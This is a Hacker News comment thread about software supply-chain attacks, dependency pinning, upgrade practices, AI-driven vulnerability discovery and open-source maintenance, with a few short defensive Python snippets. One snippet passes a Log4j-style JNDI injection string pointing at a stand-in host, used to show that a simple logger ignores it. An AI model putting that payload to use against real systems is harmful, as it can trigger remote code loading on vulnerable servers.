Maybe you shouldn't install new software for a bit
xeiaso.net
557 points by psxuaw 12 hours ago
This was always a nightmare waiting to happen. The sheer mass of packages and the consequent vast attack surface for supply chain attacks was always a problem that was eventually going to blow up in everyone's face.
But it was too convenient. Anyone warning about it or trying to limit the damage was shouted down by people who had no experience of any other way of doing things. "import antigravity" is just too easy to do without.
Well, now we're reaching the "find out" part of the process I guess.
I worked for one company where we were super conservative. Every external component was versioned. Nothing was updated without review, and usually only after it had plenty of soak time. Pretty much everything was built from source (compilers, kernel, etc.). Build servers and infrastructure couldn't reach the Internet at all, and there was process around getting any change in. We reviewed all relevant CVEs as they came out to make a call on if they apply to us or not and how we mitigate or address them.
Then I moved to another company where builds could access the Internet. We upgraded things as soon as they came out, and people thought this was good practice because we were getting the latest bug fixes. CVEs were reviewed by a security team.
Then a startup with a mix of other practices. Some very good, but we also had a big CVE debt. For example, we had secure boot on our servers and encrypted drives, and we had a pretty good grasp on securing components talking to each other.
Everyone seems to think they are doing the right thing. It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues. We as an industry could really use a better set of practices. Company #1 is my best example of dependency management done well; in general it had well-established security practices and we had really secure products.
I would rather work with a company that updates continuously, while also building security into multiple layers so that weaknesses in one layer can be mitigated by others.
For example, at one company I worked for, they created an ACL model for applications that essentially enforced rules like: “Application X in namespace A can communicate with me.” This ACL coordinated multiple technologies working together, including Kubernetes NetworkPolicies, Linkerd manifests with mTLS, and Entra ID application permissions. As a user, it was dead simple to use and abstracted away a lot of things I do not know that well.
The important part is not the specific implementation, but the mindset behind it.
An upgrade can both fix existing issues and introduce new ones. However, avoiding upgrades can create just as many problems — if not more — over time.
At the same time, I would argue that using software backed by a large community is even more important today, since bugs and vulnerabilities are more likely to receive attention, scrutiny, and timely fixes.
You forgot case #4: Worked at a startup where the frontend team thought it was a good idea to use lock files during development, but to do a "fresh" install of all dependencies during the deployment step.
And yes, they still thought they were doing the right thing.
To be fair, npm makes (made?) it weirdly hard to use lock files, so a lot of people did that by mistake. And when you do use the lockfile, it reinstalls every time, so a retagged package can just silently update.
doesn't `npm ci` prevent that? it fails if something doesn't match the lockfile, and wipes node_modules before running
This is on some ancient Node 16 build I was trying to clean up CI for, so not very recent npm.
FYI a retagged package would result in a different SHA512 integrity sum and fail the installation process. It won't "just silently update".
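For what it's worth, the integrity check is conceptually just a pinned subresource-integrity hash of the package tarball; here is a rough sketch of the idea in Python (illustrative only, not npm's actual code):

```python
import base64
import hashlib

def sri_sha512(tarball: bytes) -> str:
    # Subresource-integrity style value, like the "integrity" field a
    # lockfile pins for each package tarball: "sha512-" + base64 digest.
    digest = hashlib.sha512(tarball).digest()
    return "sha512-" + base64.b64encode(digest).decode("ascii")

# If a version is retagged to point at a different tarball, the recomputed
# value no longer matches the pinned one and the install fails.
assert sri_sha512(b"original tarball") != sri_sha512(b"retagged tarball")
```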
Anyway, the point of parent and me wasn't that it was considered to be a "mistake", but people thinking they "are doing the right thing".
I can’t comment on the behavior of ancient npm versions, but with modern npm I would not even know how to skip using a lockfile.
As for the parent comment about not using the lockfile for the production build, that’s just incredibly incompetent.
Maybe they should hire someone who knows what they are doing. Contrary to the popular beliefs of backend engineers online, you also need some competency to do frontend properly.
In this case what’s needed is `npm ci` instead of `npm install`, or better, `pnpm install --frozen-lockfile`.
Pnpm will also do that automatically if the CI environment variable is set.
> Everyone seems to think they are doing the right thing
I like to think people would agree more on the appropriate method if they saw the risk as large enough.
If you could convince everyone that a nuclear bomb would get dropped on their heads (or a comparably devastating event) if a vulnerability gets in, I highly doubt a company like #2 would still believe they're doing things optimally, for example.
> if they saw the risk as large enough.
If you expose people to the true risks instead of allowing them to be ignorant, the conclusion that they might come to is that they shouldn’t develop software at all.
Really? You think the alternate mode where you're running 5-year-old versions of stuff with tons of known security flaws is better?
What part of "We reviewed all relevant CVEs as they came out to make a call on if they apply to us or not and how we mitigate or address them" gave you that impression?
>running 5-year-old versions of stuff with tons of known security flaws
No one in this thread proposed that, or anything that could be reasonably assumed to have meant that.
> It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues
I would count myself as a "frequent upgrader" - I admin a bunch of Ubuntu machines and typically set them to auto-update each night. I am aware of the risks of introducing new issues, but that's offset by the risks of not upgrading when new bugs are found and patched. There's also the issue of organisations that fall far behind on versions of software, which then creates an even bigger problem, though this is more common with Windows/proprietary software as you have less control over that. At least with Linux, you can generally find ways to install e.g. old versions of Java that may be required for specific tools.
There's no simple one-size-fits-all and it depends on the organisation's pool of skills as to whether it's better to proactively upgrade or to reluctantly upgrade at a slower pace. In my experience, the bugs introduced by new versions of software are easier to fix/workaround than the various issues of old software versions.
So, to play Pandora, what if the net effect of uncovering all these unknown attack vectors is it actually empties the holsters of every national intelligence service around the world? Just an idea I have been playing with. Say it basically cleans up everything and everyone looking for exploits has to start from scratch except “scratch” is now a place where any useful piece of software has been fuzz tested, property tested and formally verified.
Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.
TBH this is a pretty good way of looking at it. Yeah we're seeing an explosion of vulnerabilities being found right now, but that (hopefully) means those vulnerabilities are all being cleaned up and we're entering a more hardened era of software. Minus the software packages that are being intentionally put out as exploits, of course. Maybe some might say it's too optimistic and naive, but I think you have a good point.
I agree with the prediction but not the timing. We won't enter a more hardened era of software until after a long period of security vulnerabilities.
Rivers caught on fire for a hundred years before the EPA was formed.
New code will also use these tools from the get go, hopefully vastly reducing the vulnerabilities that make it to prod to begin with.
The future may be distributed quite unevenly here, as they say, with a divergence between a small amount of "responsible" code in systems which leverage AI defensively, and a larger amount of vibe-coded / prompt-engineered code in systems which don't go through the extra trouble, and in fact create additional risk by cutting corners on human review. I personally know a lot of people using AI to create software faster, but none of them have created special security harnesses a la Mozilla (https://arstechnica.com/information-technology/2026/05/mozil...).
> we're entering a more hardened era of software
This is one force that operates. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have turned to an open source library.
I think the effect will generally be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OSS library; there's no reason to assume the average author would magically create fewer bugs than the original OSS library authors initially did. But the vulnerabilities will have much narrower scope: If you successfully exploit an OSS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economic incentive of finding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".
If I hand-roll my logging library, I'm unlikely to include automatic LDAP requests based on message text (the infamous Log4j vulnerability).
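A hand-rolled logger is usually nothing more than formatting plus a write, with the message treated as opaque text; a sketch (Python here purely for illustration):

```python
import sys
import time

def log(level: str, message: str) -> None:
    # Format a timestamp, a level, and the message, then write it out.
    # The message is treated as opaque text: nothing in it is parsed,
    # looked up, or fetched over the network.
    line = f"{time.strftime('%Y-%m-%dT%H:%M:%S')} [{level.upper()}] {message}"
    print(line, file=sys.stderr)

# A Log4j-style "${jndi:ldap://...}" payload is just printed verbatim here.
log("info", "user ${jndi:ldap://evil.example/a} logged in")
```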
I’m seeing a lot of similar things during code reviews of substantially LLM-produced codebases now. Half-baked bad ideas that probably leaked from training sets.
Typically when hand-rolling code you implement only what you require for your use case, while a library will be more general purpose. As a consequence of doing more, it has more code and more bugs.
Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge cases properly.
For supply chain security and bug count, I'll take a focused custom implementation of specific features over a library full of generalized functionality.
Yes, a lot hinges on how little you can get away with implementing for your use case. If you have an XML config file with 3 settings in it, you probably won't need to implement handling of external entities the way a full XML parsing library would, which will close off an entire class of attendant vulnerabilities.
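As a sketch of what that minimal version might look like (hypothetical tag names; Python's stdlib parser, which doesn't expand external entities):

```python
import xml.etree.ElementTree as ET

def read_settings(path: str) -> dict[str, str]:
    # Config file assumed to look something like (hypothetical):
    #   <config><host>db.local</host><port>5432</port><debug>false</debug></config>
    # Only three known tags are read, and the stdlib ElementTree parser does not
    # expand external entities, so that whole class of XML features simply has
    # no code path here.
    root = ET.parse(path).getroot()
    return {name: root.findtext(name, default="") for name in ("host", "port", "debug")}
```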
> Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge cases properly.
This isn't really an argument in favour of having the average programmer reimplement stuff, though. For it to be, you'd have to argue that the leftpad author was unusually sloppy. That may be true in this specific case, but in general, I'm not persuaded that the average OSS author is worse than the average programmer overall. IMHO, contributing your work to an OSS ecosystem is already a mild signal of competence.
On the wider topic of reimplementation: Recently there was an article here about how the latest Ubuntu includes a bunch of coreutils binaries that have been rewritten in Rust. It turns out that, while this presumably reduced the number of memory corruption bugs (there was still one, somehow; I didn't dig into it), it introduced a bunch of new vulnerabilities, mostly caused by creating race conditions between checking a filesystem path and using the path for something.
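That class of bug is the classic check-then-use (TOCTOU) race; a generic sketch of the racy shape and a descriptor-based alternative (illustrative only, not the actual coreutils code):

```python
import os

def write_racy(path: str, data: bytes) -> None:
    # Check-then-use: between the islink() check and the open(), the path can
    # be swapped for a symlink, and the write then follows it somewhere else.
    if not os.path.islink(path):        # check
        with open(path, "wb") as f:     # use (the path may have changed by now)
            f.write(data)

def write_via_fd(path: str, data: bytes) -> None:
    # Safer shape: open once with O_NOFOLLOW (a POSIX-only flag) and operate
    # on the descriptor, so the thing checked and the thing used are the same object.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW, 0o600)
    try:
        os.write(fd, data)
    finally:
        os.close(fd)
```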
This argument goes even further. If you have only 3 settings, why does it need to be an XML file?
ETA: I'm not saying it has to, I'm saying it's possible to imagine reasons that would justify this decision in some cases.
Because it might grow in future and you want to allow flexibility for that; because it might be the input to or output from some external system that requires XML; because your team might have standardised on always using XML config files; because introducing yet another custom plain-text file format just creates unnecessary cognitive load for everyone who has to use it. Those are real-world reasons I can think of.
But really I was just looking for a concrete example where I know the complexity of the implementation has definitely caused vulnerabilities, whether or not the choice to use it to solve the problem at hand was sensible. I have zero love for XML.
>there's no reason to assume the average author would magically create fewer bugs than the original OSS library authors initially did
Have you read this old code? It's terrible and written with no care at all for security, often in C. AI is much, much better at writing code.
Do you have a specific library in mind? I think it would have to be an ancient, unmaintained C library.
But I think most OSS code isn't like this -- even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel, GNU userland, PostgreSQL, Python.
> even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel
There have been two LPE vulnerabilities and exploits in the Linux kernel announced today, after the one announced just last week. I don't think as much of the C code born long ago has been as carefully hardened as you think.
(Copy Fail 2 and Dirty Frag today, and Copy Fail last week)
One. "Copy Fail 2" and "Dirty Frag" are the same thing.
And considering the size of the kernel, I call this stupendously good.
You (anyone, not you personally) write that much code yourself and let's see how well you did in comparison.
Sure, I didn't mean to say that these examples are guaranteed 100% safe -- just that I trust them to be enormously more safe than software that accomplishes the same task that was hand-written by either a human or an LLM last week.
Are you intentionally avoiding saying ‘thanks to LLMs’, or is it implicit? All these recent mega bugs are surfacing thanks to lots of fuzzing and agentic bashing, right?
Thank you for reminding us all that you AI bros are still the most obnoxious people there are.
Having casually read into a few recent incidents, the vector has often been outside of the software itself: a lot of misconfigurations, or simply attacking the human in the chain. And nation states have basically unbounded resources for everything from bribes and insiders to standing up entire companies.
I think it will be an arms race in the future as well. Easier to fix known vulnerabilities automatically, but also easier to find new ones, and the occasional AI fuckup instead of the occasional human fuckup.
Yeah.
Right now it kinda feels to me like "Open Source" is the Russian army, relying on sheer numbers and a huge quantity of equipment, much of which is decades old.
Meanwhile attackers and bug hunters are like the Ukrainians, using new, inexpensive, and surprisingly powerful tools that none of the Open Source community has ever seen in the past, and for which it has very little defence capability.
The attackers with cheap drones or LLMs are completely overwhelming the old school, who perhaps didn't notice how quickly the world has changed around them, or did notice but cannot do anything about it quickly enough.
Well this argument was certainly inventive. What a weird impression to have about these things.
Who exactly is the innocent little Ukraine supposed to be, that big bad open source is attacking in order to, what, take their land and make the OSS leader look powerful and successful at achieving goals to distract from their fundamental awfulness? And who is the North Korean cannon fodder purchased by OSS, while we're at it?
Yeah it's just like that, practically the same situation. The authors of gnu cp and ls can't wait to get, idk, something apparently, out of the war they started when they attacked, idk, someone apparently.
New software is being generated faster than it can be adequately tested. We are in the same place we’ve always been; except everything is moving much too fast.
This is exactly the feeling I have. First: excessive growth of dependencies fueled by free components.
* with internet access to FOSS via sourceforge and github we got an abundance of building blocks
* with central repositories like CPAN, npm, pip, cargo and docker those building blocks became trivially easy to use
Then LLMs and agents added velocity to building apps and producing yet more components, feeding back into the dependency chain. Worse: new code with unattributed reuse of questionable patterns found in unknowable versions of existing libraries. That is, implicit dependencies on fragments of a multitude of packages.
This may all end well ultimately, but we're definitely in for a bumpy ride.
This assumes that there are no new exploits being generated.
We're seeing maintainers retreat from maintaining because the amount of AI slop being pushed at them is too much. How many are just going to hand over the maintenance burden to someone else, and how many of those new maintainers are going to be evil?
The essential problem is that our entire system of developing civilisation-critical software depends on the goodwill of a limited set of people to work for free and publish their work for everyone else to use. This was never sustainable, or even sensible, but because it was easy we based everything on it.
We need to solve the underlying problem: how to sustainably develop and maintain the software we need.
A large part of this is going to have to be: companies that use software to generate profits paying part of those profits towards the development and maintenance of that software. It just can't work any other way. How we do this is an open question that I have no answers for.
That is already how it works. The loner hacker in mom's basement working for free on his super critical OSS package is largely a myth. The vast majority of OSS code is contributed by companies paying their employees to work on it.
I'm thinking of projects like curl [0]. It is a cornerstone of modern software development. If it died, or if it got taken over by a malicious entity, every single company on the planet would have an immediate security problem. Yet the experience of that maintainer is bad verging on terrible [1].
We need to do better than this.
>As an example, he put up a slide listing the 47 car brands that use curl in their products; he followed it with a slide listing the brands that contribute to curl. The second slide, needless to say, was empty.
>He emphasized that he has released curl under a free license, so there is no legal problem with what these companies are doing. But, he suggested, these companies might want to think a bit more about the future of the software they depend on.
There is little reason for minimal-restriction licenses to exist other than to allow corporate use without compensation or contribution. I would think that by now, any hope that companies would voluntarily be any less exploitative than they can be has been dashed.
If you aren't getting paid or working purely for your own benefit, use a protective license. Though, if thinly veiled license violation via LLM is allowed to stand, this won't be enough.
There is a lot of opposition in the FOSS community to restrictive/protective licenses. And to be fair, this comes from a consistent and entirely logical worldview.
There's a bunch of problems with getting companies to pay for this, too - that sense of entitlement (or even contractual obligation), the ability to control the project with cash, etc.
I don't have any answers or solutions. But I don't think we can hand-wave the problem away.
The problem is that they get away too easily with bugs in the products they ship to customers. If shipping bugs came with some penalties, there would be an incentive to invest in security, and that would probably often flow back to upstream projects.